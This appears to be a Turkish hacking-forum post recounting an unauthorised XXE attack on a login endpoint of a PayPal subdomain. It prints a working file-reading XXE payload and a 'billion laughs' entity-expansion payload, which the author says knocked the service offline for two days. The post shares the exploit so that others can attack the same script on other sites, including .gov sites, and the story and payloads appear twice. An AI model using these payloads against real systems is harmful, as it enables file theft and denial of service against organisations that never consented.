B
blackdewil
cümleten selamlar. epeydir ne var ne yok bakma fırsatım olmuyordu @Mectruy 'in maili ve hesabın şifresini sıfırlamasıyla uzunca bir aradan sonra hesaba tekrar giriş yapabildik eski harddiskimi kurcalarken bulduğum (yanlış hatırlamıyorsam 1-1,5 yıl oluyor) bu açığın mevzusu şöyle;
exploiti de dosya ekine koydum. herkese kolay gelsin.
Revealed content
normal login datasındaki herhangi bir parametreye sorguyu bozan karakter attığınızda
{ "message" : "javax.xml.bind.UnmarshalException\n - with linked exception:\n[org.xml.sax.SAXParseException; lineNumber: 1; columnNumber: 2; The markup in the document preceding the root element must be well-formed.]" }
size bu şekilde bir exception dönüyor. hatada zaten saxparser geçtiğini gördüğüm gibi direk xml üzerinden bir şeyler döndüğünü anladım ve xxe payloadları denemeye başladım. en sonunda xxe payloadını yedirdim dropzone.paypal.com ' un win.ini dosyasına kadar okudum. xxe varsa muhtemelen out of band (ooo) de vardır diyip birkaç payload daha salladım paypalın o subdomaini yaklaşık 2 gün kapalı kaldı tekrar açıldığında aynı payloadları yolladığımda sistem arkaplanda requesti işleyemiyordu. ya fazla yüklenip bir servisin motorunu bozduk , ya da ibneler olayı çaktı.
madem ekmek çıkmıyor bari para alalım diyip bug bounty olarak bildirdim , kanıt istediler.sistem arkaplanda requesti işleyemediğinden kanıt olarak herhangi bir poz atamadım , direkt olarak win.ini dosyalarını attım ama ona da inandıramadık. öylece kaldı elimde.
kullandıkları scriptin adı ne tam olarak bilmediğimden direkt olarak bulduğum yerin adıyla konuyu açtım. aranızda belki ilerletenler çıkar , farklı yerlerde bulanlar çıkar diye exploiti ve çıktısını paylaşıyorum. bayağı .us , .gov sitede kuruluydu hatta yanlış hatırlamıyorsam PayPal'ın dropzone hariç bir subdomaininde daha kuruluydu bu script , bulabilirseniz gömün r57'yi geçin.
çalıştırdığım payloadlar;
OOB payload:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
XXE payload:
<?xml version="1.0"?>
<!DOCTYPE abc [
<!ENTITY prefix "49cd7763">
<!ENTITY attack SYSTEM "php://filter/read=convert.base64-encode/resource=../../../../../../../../../../windows/win.ini">
]>
<user><username>&prefix;&attack;</username><password>blackdewil</password></user>
{ "message" : "javax.xml.bind.UnmarshalException\n - with linked exception:\n[org.xml.sax.SAXParseException; lineNumber: 1; columnNumber: 2; The markup in the document preceding the root element must be well-formed.]" }
size bu şekilde bir exception dönüyor. hatada zaten saxparser geçtiğini gördüğüm gibi direk xml üzerinden bir şeyler döndüğünü anladım ve xxe payloadları denemeye başladım. en sonunda xxe payloadını yedirdim dropzone.paypal.com ' un win.ini dosyasına kadar okudum. xxe varsa muhtemelen out of band (ooo) de vardır diyip birkaç payload daha salladım paypalın o subdomaini yaklaşık 2 gün kapalı kaldı tekrar açıldığında aynı payloadları yolladığımda sistem arkaplanda requesti işleyemiyordu. ya fazla yüklenip bir servisin motorunu bozduk , ya da ibneler olayı çaktı.
madem ekmek çıkmıyor bari para alalım diyip bug bounty olarak bildirdim , kanıt istediler.sistem arkaplanda requesti işleyemediğinden kanıt olarak herhangi bir poz atamadım , direkt olarak win.ini dosyalarını attım ama ona da inandıramadık. öylece kaldı elimde.
kullandıkları scriptin adı ne tam olarak bilmediğimden direkt olarak bulduğum yerin adıyla konuyu açtım. aranızda belki ilerletenler çıkar , farklı yerlerde bulanlar çıkar diye exploiti ve çıktısını paylaşıyorum. bayağı .us , .gov sitede kuruluydu hatta yanlış hatırlamıyorsam PayPal'ın dropzone hariç bir subdomaininde daha kuruluydu bu script , bulabilirseniz gömün r57'yi geçin.
çalıştırdığım payloadlar;
OOB payload:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
XXE payload:
<?xml version="1.0"?>
<!DOCTYPE abc [
<!ENTITY prefix "49cd7763">
<!ENTITY attack SYSTEM "php://filter/read=convert.base64-encode/resource=../../../../../../../../../../windows/win.ini">
]>
<user><username>&prefix;&attack;</username><password>blackdewil</password></user>
Ekli dosyalar
Moderatör tarafında düzenlendi: